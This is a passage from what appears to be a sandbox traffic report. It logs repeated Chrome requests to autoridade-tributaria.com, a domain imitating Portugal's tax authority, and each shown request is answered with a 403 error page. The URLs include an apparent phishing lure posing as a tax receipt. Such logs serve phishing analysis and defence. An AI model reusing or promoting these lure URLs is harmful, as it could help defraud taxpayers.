GPNRD0FRNH9273ZMZB2JWTWX8DZF1OIUOXIMUEYY5TO5YJGHB0RC7NDK01T9D9K98QPNVM2TNCPFE16Y6QEB6GXBSVX1ZYX63P7J44W087Y488U853DK4WC14O4AYA6WRSN04Z4C1OD9S0DUAZ63Z7BFNGQSAWA7BCPRX3EI8A7SVCLDLL9DDDBURGOKHOBEOF8PNZ8HTK4X9VXJ5MH0K747B4AQQRAV93EPE50WN1XQIQU6XE25GMRQMAOTZT2BWJZGRGE9XUO6NPKXLE4LKFPWNKDDTIB39U193OQP92LZ7UD6N1ITKSOT5831DBSOTV62Z [TRUNCATED] Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 16:30:29 UTC	263	IN	HTTP/1.1 403 Forbidden Date: Mon, 24 Mar 2025 16:30:28 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Thu, 29 Sep 2022 22:59:26 GMT Accept-Ranges: bytes Content-Length: 22122 Vary: Accept-Encoding Content-Type: text/html
2025-03-24 16:30:29 UTC	7929	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 Data Ascii: <!doctype html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en"> <![endif]-->...[if gt IE 8]><!
2025-03-24 16:30:29 UTC	8000	IN	Data Raw: 70 74 73 20 69 6e 64 69 76 69 64 75 61 69 73 20 71 75 65 20 64 65 76 65 6d 20 73 65 72 20 65 78 65 63 75 74 61 64 6f 73 20 61 74 72 61 76 c3 a9 73 20 64 65 20 73 6f 6c 69 63 69 74 61 c3 a7 c3 b5 65 73 2e 20 41 6c 67 75 6e 73 20 64 65 73 74 65 73 20 73 c3 a3 6f 20 6d 61 69 73 20 66 c3 a1 63 65 69 73 20 64 65 20 65 6e 63 6f 6e 74 72 61 72 20 65 20 63 6f 72 72 69 67 69 72 20 64 6f 20 71 75 65 20 6f 75 74 72 6f 73 2e 3c 2f 70 3e 0d 0a 09 09 09 09 09 09 09 3c 68 34 3e 50 72 6f 70 72 69 65 64 61 64 65 20 64 65 20 41 72 71 75 69 76 6f 73 20 65 20 44 69 72 65 74 c3 b3 72 69 6f 73 3c 2f 68 34 3e 0d 0a 09 09 09 09 09 09 09 3c 70 3e 4f 20 73 65 72 76 69 64 6f 72 20 6e 6f 20 71 75 61 6c 20 76 6f 63 c3 aa 20 65 73 74 c3 a1 20 68 6f 73 70 65 64 61 64 6f 20 72 6f 64 61 Data Ascii: pts individuais que devem ser executados atravs de solicitaes. Alguns destes so mais fceis de encontrar e corrigir do que outros.</p><h4>Propriedade de Arquivos e Diretrios</h4><p>O servidor no qual voc est hospedado roda
2025-03-24 16:30:29 UTC	6193	IN	Data Raw: 64 6f 73 20 63 65 6e c3 a1 72 69 6f 73 2c 20 65 20 61 66 65 74 61 20 64 69 72 65 74 61 6d 65 6e 74 65 20 6f 20 66 75 6e 63 69 6f 6e 61 6d 65 6e 74 6f 20 64 65 20 73 65 75 20 77 65 62 73 69 74 65 2e 3c 2f 70 3e 0d 0a 09 09 09 09 09 09 09 3c 70 3e 52 65 64 69 72 65 63 69 6f 6e 61 6d 65 6e 74 6f 73 20 65 20 72 65 65 73 63 72 69 74 61 73 20 64 65 20 55 52 4c 20 73 c3 a3 6f 20 64 75 61 73 20 64 69 72 65 74 69 76 61 73 20 63 6f 6d 75 6e 73 20 65 6e 63 6f 6e 74 72 61 64 61 73 20 6e 6f 20 2e 68 74 61 63 63 65 73 73 20 65 20 6d 75 69 74 6f 73 20 73 63 72 69 70 74 73 2c 20 63 6f 6d 6f 20 6f 20 57 6f 72 64 50 72 65 73 73 2c 20 44 72 75 70 61 6c 2c 20 4a 6f 6f 6d 6c 61 20 65 20 4d 61 67 65 6e 74 6f 2c 20 70 6f 72 20 65 78 65 6d 70 6c 6f 2c 20 61 64 69 63 69 6f 6e 61 Data Ascii: dos cenrios, e afeta diretamente o funcionamento de seu website.</p><p>Redirecionamentos e reescritas de URL so duas diretivas comuns encontradas no .htaccess e muitos scripts, como o WordPress, Drupal, Joomla e Magento, por exemplo, adiciona

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49708	162.241.60.162	443	4232	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 16:30:28 UTC	3326	OUT	GET /MAR-FAT/vukifotglknnbzeflygeszqqtytedoitdbjhhmnouenfxkheyrdsezgyppqxjeepgwimrirlqihtrkxredyzegikauxmyrgwkkluepqumxjzmjsiccnqgyukhasiqzuwbbfmabyrfamwvwqbtoxmelxttelbojidakiaotmmwesrlttbnulpaldldfspcgrmhjramzivszgyhcptagshzvfqjokbukxyaanoqhwoimqmohtvdsneqtdxpsswntgvuuitflsuotqftweeafybtpcyhnyqiphsihscqlrwlihmntbzzyhajcptdathphuiqkrhmqxlgwuuwatrrlelsdjobobywrvtygkhtnsjohrxazyyymjvjvkwgrzzaqrisfjhnxtsfvsvlgosyazbcqxjcfwcclxotxgteuvxfwxvvruczijfxejcjfldnnggafzklmcnxdnldjapuyapcjmhxanhuqumuhteenwkvpblprywdovuekhlxdfwutunnmbhoqtsvjivqelvegurxrzgwlzppcvyylpeyyqtxygwbssqheihjvbskzljocsndagparofkaecsjetbxyyuugcmblggnkhgihlrkzwwnohxnmvkfnhssmvhgesnigpvvdybwkxcpekbuntlabcxzbsgjyjmtvzqbloocsqetbuwznumqxlkhksammdkfvgqygawlbskrlyiewhforsmnhboxpcymkkbprfwjsyhgvprtfymndlrwrgbflsyotuljflssjnssaviimrkokmtruaxelplomymy HTTP/1.1 Host: autoridade-tributaria.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://autoridade-tributaria.com/MAR-FAT/Comprovativo_Marco_uGGehnlzuhp_17-03-2025_207.php?=5QIANUHVWY9RY9RLV9EDEU0O1K960ZX2O3J7881Z6MUA19M6BQML1HJNK4IWVL3BEGD5YUMZITH2A0Z2NC5MLLAFV7IDYDCZTS5V5RGSDYCJASM8IRMTQT13G7M2LH6FRXLT4B765OHXI0FCXJ5J1UG90CP7EPG5273QH2EHTQZBLFXQ1IHBNZO6PL22W92SGN2L7052FK1N7EKVR8F5HFUGU7A6ANUUWF58OLSBOP6K5B8JXHMK36LB3Z0A0912EHY1J0HFSET2J4MT81M3A50053F0USMPWDUWMH949FHKPS18LIB8W81JS86RXRZ93EFFMWG11R35KBMOCGRMRN0KNLGOMUJTUH5LNZZWBLHHE6XRZTPPALUSOR3BS3QIHMMRFBAQU3LFEUVQKY02F4SIKP662XFH4893VFLXS84HAON46ON1DWDN3D11EEW7WCMGU05UQEMH9LILCCAPJPDH5ZASOUSOL6U7CGLFT2N9N5OT4RKCDIKJ9DL60OG5W76C0LI6145SBE5AJSZ64QJBIL886PQFXSMP9L2UI2LIOGH4ILZI0JAIW43QNJ9OQ05V2RA9YDKCEAKBCD0X1GPNRD0FRNH9273ZMZB2JWTWX8DZF1OIUOXIMUEYY5TO5YJGHB0RC7NDK01T9D9K98QPNVM2TNCPFE16Y6QEB6GXBSVX1ZYX63P7J44W087Y488U853DK4WC14O4AYA6WRSN04Z4C1OD9S0DUAZ63Z7BFNGQSAWA7BCPRX3EI8A7SVCLDLL9DDDBURGOKHOBEOF8PNZ8HTK4X9VXJ5MH0K747B4AQQRAV93EPE50WN1XQIQU6XE25GMRQMAOTZT2BWJZGRGE9XUO6NPKXLE4LKFPWNKDDTIB39U193OQP92LZ7UD6N1ITKSOT5831DBSOTV62Z [TRUNCATED] Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 16:30:29 UTC	263	IN	HTTP/1.1 403 Forbidden Date: Mon, 24 Mar 2025 16:30:28 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Thu, 29 Sep 2022 22:59:26 GMT Accept-Ranges: bytes Content-Length: 22122 Vary: Accept-Encoding Content-Type: text/html
2025-03-24 16:30:29 UTC	7929	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 Data Ascii: <!doctype html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en"> <![endif]-->...[if gt IE 8]><!
2025-03-24 16:30:29 UTC	8000	IN	Data Raw: 70 74 73 20 69 6e 64 69 76 69 64 75 61 69 73 20 71 75 65 20 64 65 76 65 6d 20 73 65 72 20 65 78 65 63 75 74 61 64 6f 73 20 61 74 72 61 76 c3 a9 73 20 64 65 20 73 6f 6c 69 63 69 74 61 c3 a7 c3 b5 65 73 2e 20 41 6c 67 75 6e 73 20 64 65 73 74 65 73 20 73 c3 a3 6f 20 6d 61 69 73 20 66 c3 a1 63 65 69 73 20 64 65 20 65 6e 63 6f 6e 74 72 61 72 20 65 20 63 6f 72 72 69 67 69 72 20 64 6f 20 71 75 65 20 6f 75 74 72 6f 73 2e 3c 2f 70 3e 0d 0a 09 09 09 09 09 09 09 3c 68 34 3e 50 72 6f 70 72 69 65 64 61 64 65 20 64 65 20 41 72 71 75 69 76 6f 73 20 65 20 44 69 72 65 74 c3 b3 72 69 6f 73 3c 2f 68 34 3e 0d 0a 09 09 09 09 09 09 09 3c 70 3e 4f 20 73 65 72 76 69 64 6f 72 20 6e 6f 20 71 75 61 6c 20 76 6f 63 c3 aa 20 65 73 74 c3 a1 20 68 6f 73 70 65 64 61 64 6f 20 72 6f 64 61 Data Ascii: pts individuais que devem ser executados atravs de solicitaes. Alguns destes so mais fceis de encontrar e corrigir do que outros.</p><h4>Propriedade de Arquivos e Diretrios</h4><p>O servidor no qual voc est hospedado roda
2025-03-24 16:30:29 UTC	6193	IN	Data Raw: 64 6f 73 20 63 65 6e c3 a1 72 69 6f 73 2c 20 65 20 61 66 65 74 61 20 64 69 72 65 74 61 6d 65 6e 74 65 20 6f 20 66 75 6e 63 69 6f 6e 61 6d 65 6e 74 6f 20 64 65 20 73 65 75 20 77 65 62 73 69 74 65 2e 3c 2f 70 3e 0d 0a 09 09 09 09 09 09 09 3c 70 3e 52 65 64 69 72 65 63 69 6f 6e 61 6d 65 6e 74 6f 73 20 65 20 72 65 65 73 63 72 69 74 61 73 20 64 65 20 55 52 4c 20 73 c3 a3 6f 20 64 75 61 73 20 64 69 72 65 74 69 76 61 73 20 63 6f 6d 75 6e 73 20 65 6e 63 6f 6e 74 72 61 64 61 73 20 6e 6f 20 2e 68 74 61 63 63 65 73 73 20 65 20 6d 75 69 74 6f 73 20 73 63 72 69 70 74 73 2c 20 63 6f 6d 6f 20 6f 20 57 6f 72 64 50 72 65 73 73 2c 20 44 72 75 70 61 6c 2c 20 4a 6f 6f 6d 6c 61 20 65 20 4d 61 67 65 6e 74 6f 2c 20 70 6f 72 20 65 78 65 6d 70 6c 6f 2c 20 61 64 69 63 69 6f 6e 61 Data Ascii: dos cenrios, e afeta diretamente o funcionamento de seu website.</p><p>Redirecionamentos e reescritas de URL so duas diretivas comuns encontradas no .htaccess e muitos scripts, como o WordPress, Drupal, Joomla e Magento, por exemplo, adiciona

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49710	162.241.60.162	443	4232	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 16:30:28 UTC	3329	OUT	GET /MAR-FAT/zfpcnqfatnjbutdikfftxiaejnyrvroysxyrzddzvwncvckruzmrdzpbttlloddclmhrartkqlrweqihkqkousypwrvmghrvhylgyjsvshenslbwmevrjptqlmpcyhlallmtiivdarrlquzjkaalnbybknntwpzqolrtacennbzhffvzwqjqgpuecmohowbbirpcakchrghaenjdsyodrermweystzqvvcawtgebbhxsjtvmezmghvjtnvehlecuivakrvgtmjlvxgqaqckktyvxztapyuwykkyirrkmbbuzemiwuvrhaeggnrkjrptqvnglulypedccvhxnmazyihchpjrqllukpcvxjfntjorjtsmqytincmctycfshmgcbirzzdxtoqddbaldojunzadqmdwckfpttsdiktfvvwkbculgzlwqzpnfnfnpigsrkxtsttthmzocpvjkdtewgbqzmemfvonlcxhiiddtebyjiekgelskglgqdfffwgiwcwwlrefctjfhmcxtovqtrfhfkqmfturzzgsrrhamhignldncwljomwzznchxyvidnvlvigyhducywdescdowvjulzovighhxslwbaanbxtetodahjaewftjhncpvqjvawjzsgvqtlmchsjktbjkahjtocdjwjlmqoadhwfilvmtgrlaixtqbzxcnygdgzfbaodwtzvynmmeocdtkuboxoexqnkczeonswrzcvtcpyouivnurxjcvkgvrosukateovunsbcpobygabvlcpxmhfnxpboyatcnpyyvem HTTP/1.1 Host: autoridade-tributaria.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://autoridade-tributaria.com/MAR-FAT/Comprovativo_Marco_uGGehnlzuhp_17-03-2025_207.php?=5QIANUHVWY9RY9RLV9EDEU0O1K960ZX2O3J7881Z6MUA19M6BQML1HJNK4IWVL3BEGD5YUMZITH2A0Z2NC5MLLAFV7IDYDCZTS5V5RGSDYCJASM8IRMTQT13G7M2LH6FRXLT4B765OHXI0FCXJ5J1UG90CP7EPG5273QH2EHTQZBLFXQ1IHBNZO6PL22W92SGN2L7052FK1N7EKVR8F5HFUGU7A6ANUUWF58OLSBOP6K5B8JXHMK36LB3Z0A0912EHY1J0HFSET2J4MT81M3A50053F0USMPWDUWMH949FHKPS18LIB8W81JS86RXRZ93EFFMWG11R35KBMOCGRMRN0KNLGOMUJTUH5LNZZWBLHHE6XRZTPPALUSOR3BS3QIHMMRFBAQU3LFEUVQKY02F4SIKP662XFH4893VFLXS84HAON46ON1DWDN3D11EEW7WCMGU05UQEMH9LILCCAPJPDH5ZASOUSOL6U7CGLFT2N9N5OT4RKCDIKJ9DL60OG5W76C0LI6145SBE5AJSZ64QJBIL886PQFXSMP9L2UI2LIOGH4ILZI0JAIW43QNJ9OQ05V2RA9YDKCEAKBCD0X1GPNRD0FRNH9273ZMZB2JWTWX8DZF1OIUOXIMUEYY5TO5YJGHB0RC7NDK01T9D9K98QPNVM2TNCPFE16Y6QEB6GXBSVX1ZYX63P7J44W087Y488U853DK4WC14O4AYA6WRSN04Z4C1OD9S0DUAZ63Z7BFNGQSAWA7BCPRX3EI8A7SVCLDLL9DDDBURGOKHOBEOF8PNZ8HTK4X9VXJ5MH0K747B4AQQRAV93EPE50WN1XQIQU6XE25GMRQMAOTZT2BWJZGRGE9XUO6NPKXLE4LKFPWNKDDTIB39U193OQP92LZ7UD6N1ITKSOT5831DBSOTV62Z [TRUNCATED] Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 16:30:29 UTC	263	IN	HTTP/1.1 403 Forbidden Date: Mon, 24 Mar 2025 16:30:28 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Thu, 29 Sep 2022 22:59:26 GMT Accept-Ranges: bytes Content-Length: 22122 Vary: Accept-Encoding Content-Type: text/html
2025-03-24 16:30:29 UTC	7929	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 Data Ascii: <!doctype html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en"> <![endif]-->...[if gt IE 8]><!
2025-03-24 16:30:29 UTC	8000	IN	Data Raw: 70 74 73 20 69 6e 64 69 76 69 64 75 61 69 73 20 71 75 65 20 64 65 76 65 6d 20 73 65 72 20 65 78 65 63 75 74 61 64 6f 73 20 61 74 72 61 76 c3 a9 73 20 64 65 20 73 6f 6c 69 63 69 74 61 c3 a7 c3 b5 65 73 2e 20 41 6c 67 75 6e 73 20 64 65 73 74 65 73 20 73 c3 a3 6f 20 6d 61 69 73 20 66 c3 a1 63 65 69 73 20 64 65 20 65 6e 63 6f 6e 74 72 61 72 20 65 20 63 6f 72 72 69 67 69 72 20 64 6f 20 71 75 65 20 6f 75 74 72 6f 73 2e 3c 2f 70 3e 0d 0a 09 09 09 09 09 09 09 3c 68 34 3e 50 72 6f 70 72 69 65 64 61 64 65 20 64 65 20 41 72 71 75 69 76 6f 73 20 65 20 44 69 72 65 74 c3 b3 72 69 6f 73 3c 2f 68 34 3e 0d 0a 09 09 09 09 09 09 09 3c 70 3e 4f 20 73 65 72 76 69 64 6f 72 20 6e 6f 20 71 75 61 6c 20 76 6f 63 c3 aa 20 65 73 74 c3 a1 20 68 6f 73 70 65 64 61 64 6f 20 72 6f 64 61 Data Ascii: pts individuais que devem ser executados atravs de solicitaes. Alguns destes so mais fceis de encontrar e corrigir do que outros.</p><h4>Propriedade de Arquivos e Diretrios</h4><p>O servidor no qual voc est hospedado roda
2025-03-24 16:30:29 UTC	6193	IN	Data Raw: 64 6f 73 20 63 65 6e c3 a1 72 69 6f 73 2c 20 65 20 61 66 65 74 61 20 64 69 72 65 74 61 6d 65 6e 74 65 20 6f 20 66 75 6e 63 69 6f 6e 61 6d 65 6e 74 6f 20 64 65 20 73 65 75 20 77 65 62 73 69 74 65 2e 3c 2f 70 3e 0d 0a 09 09 09 09 09 09 09 3c 70 3e 52 65 64 69 72 65 63 69 6f 6e 61 6d 65 6e 74 6f 73 20 65 20 72 65 65 73 63 72 69 74 61 73 20 64 65 20 55 52 4c 20 73 c3 a3 6f 20 64 75 61 73 20 64 69 72 65 74 69 76 61 73 20 63 6f 6d 75 6e 73 20 65 6e 63 6f 6e 74 72 61 64 61 73 20 6e 6f 20 2e 68 74 61 63 63 65 73 73 20 65 20 6d 75 69 74 6f 73 20 73 63 72 69 70 74 73 2c 20 63 6f 6d 6f 20 6f 20 57 6f 72 64 50 72 65 73 73 2c 20 44 72 75 70 61 6c 2c 20 4a 6f 6f 6d 6c 61 20 65 20 4d 61 67 65 6e 74 6f 2c 20 70 6f 72 20 65 78 65 6d 70 6c 6f 2c 20 61 64 69 63 69 6f 6e 61 Data Ascii: dos cenrios, e afeta diretamente o funcionamento de seu website.</p><p>Redirecionamentos e reescritas de URL so duas diretivas comuns encontradas no .htaccess e muitos scripts, como o WordPress, Drupal, Joomla e Magento, por exemplo, adiciona

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49703	162.241.60.162	443	4232	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 16:30:28 UTC	3302	OUT	GET /MAR-FAT/neopxugdclctfafzduckevuvdrhnlkcdxbhjjcvresdolsbuflakfnsnpdxasooxyajokuqzlwejtjadqdyevspgfhwgerpxksmrkwlkagfmuvhfvceucawaoducgfzxgbnkzqkoeqnjndilkwipgjibqaptmxuatetscqvilypvfstnfdfewxxwqokotsinjjotwpjvsjgxhcmjiyxjrbwdymqecxbzwjsbspwkzikumdscfosfrmqxgwvmwwwdgzcigykrpnkcszvfllfcgcaknczrrjtctixllcinbxsnhyniwkgovbycxrecikzdxwqrjxizfqdcopslqkwkfsrsvlukyedvjdzmmkdndeqcivnqcrkulvqhallmvdzyfbwnkvyrcfmbnrlkwulaugqakacmpapnrtnubtciqsesjobkwluqtdokdsvvcugxfqinoydqqvndhbjoeqnnewseqjadksmpqgbcjlawcamnbzmadrytaeoipzjhweblwopgcotsiyjmpmvglarppyucazrkbzcmeqfyqttaxpqrdvbxxlnskilyzvczvbvzbwhkexoxqdcfdrdxqxnwgsrrzkbogrunhxocbydspatiiwflcsafdubfrtebrfuxvqyqzgmaaxvnqmrxujqailfuaejqrmwexdscwhzuotvoixfaqpdxkvfyegrrdkipbvfpvxgayupnurtrujpqckgkpvpvcgstahfqgceehjbpvrlbpaikltvdxxrzxlvmumqyvduuwg HTTP/1.1 Host: autoridade-tributaria.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://autoridade-tributaria.com/MAR-FAT/Comprovativo_Marco_uGGehnlzuhp_17-03-2025_207.php?=5QIANUHVWY9RY9RLV9EDEU0O1K960ZX2O3J7881Z6MUA19M6BQML1HJNK4IWVL3BEGD5YUMZITH2A0Z2NC5MLLAFV7IDYDCZTS5V5RGSDYCJASM8IRMTQT13G7M2LH6FRXLT4B765OHXI0FCXJ5J1UG90CP7EPG5273QH2EHTQZBLFXQ1IHBNZO6PL22W92SGN2L7052FK1N7EKVR8F5HFUGU7A6ANUUWF58OLSBOP6K5B8JXHMK36LB3Z0A0912EHY1J0HFSET2J4MT81M3A50053F0USMPWDUWMH949FHKPS18LIB8W81JS86RXRZ93EFFMWG11R35KBMOCGRMRN0KNLGOMUJTUH5LNZZWBLHHE6XRZTPPALUSOR3BS3QIHMMRFBAQU3LFEUVQKY02F4SIKP662XFH4893VFLXS84HAON46ON1DWDN3D11EEW7WCMGU05UQEMH9LILCCAPJPDH5ZASOUSOL6U7CGLFT2N9N5OT4RKCDIKJ9DL60OG5W76C0LI6145SBE5AJSZ64QJBIL886PQFXSMP9L2UI2LIOGH4ILZI0JAIW43QNJ9OQ05V2RA9YDKCEAKBCD0X1GPNRD0FRNH9273ZMZB2JWTWX8DZF1OIUOXIMUEYY5TO5YJGHB0RC7NDK01T9D9K98QPNVM2TNCPFE16Y6QEB6GXBSVX1ZYX63P7J44W087Y488U853DK4WC14O4AYA6WRSN04Z4C1OD9S0DUAZ63Z7BFNGQSAWA7BCPRX3EI8A7SVCLDLL9DDDBURGOKHOBEOF8PNZ8HTK4X9VXJ5MH0K747B4AQQRAV93EPE50WN1XQIQU6XE25GMRQMAOTZT2BWJZGRGE9XUO6NPKXLE4LKFPWNKDDTIB39U193OQP92LZ7UD6N1ITKSOT5831DBSOTV62Z [TRUNCATED] Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 16:30:29 UTC	263	IN	HTTP/1.1 403 Forbidden Date: Mon, 24 Mar 2025 16:30:28 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Thu, 29 Sep 2022 22:59:26 GMT Accept-Ranges: bytes Content-Length: 22122 Vary: Accept-Encoding Content-Type: text/html
2025-03-24 16:30:29 UTC	7929	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 Data Ascii: <!doctype html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en"> <![endif]-->...[if gt IE 8]><!
2025-03-24 16:30:29 UTC	8000	IN	Data Raw: 70 74 73 20 69 6e 64 69 76 69 64 75 61 69 73 20 71 75 65 20 64 65 76 65 6d 20 73 65 72 20 65 78 65 63 75 74 61 64 6f 73 20 61 74 72 61 76 c3 a9 73 20 64 65 20 73 6f 6c 69 63 69 74 61 c3 a7 c3 b5 65 73 2e 20 41 6c 67 75 6e 73 20 64 65 73 74 65 73 20 73 c3 a3 6f 20 6d 61 69 73 20 66 c3 a1 63 65 69 73 20 64 65 20 65 6e 63 6f 6e 74 72 61 72 20 65 20 63 6f 72 72 69 67 69 72 20 64 6f 20 71 75 65 20 6f 75 74 72 6f 73 2e 3c 2f 70 3e 0d 0a 09 09 09 09 09 09 09 3c 68 34 3e 50 72 6f 70 72 69 65 64 61 64 65 20 64 65 20 41 72 71 75 69 76 6f 73 20 65 20 44 69 72 65 74 c3 b3 72 69 6f 73 3c 2f 68 34 3e 0d 0a 09 09 09 09 09 09 09 3c 70 3e 4f 20 73 65 72 76 69 64 6f 72 20 6e 6f 20 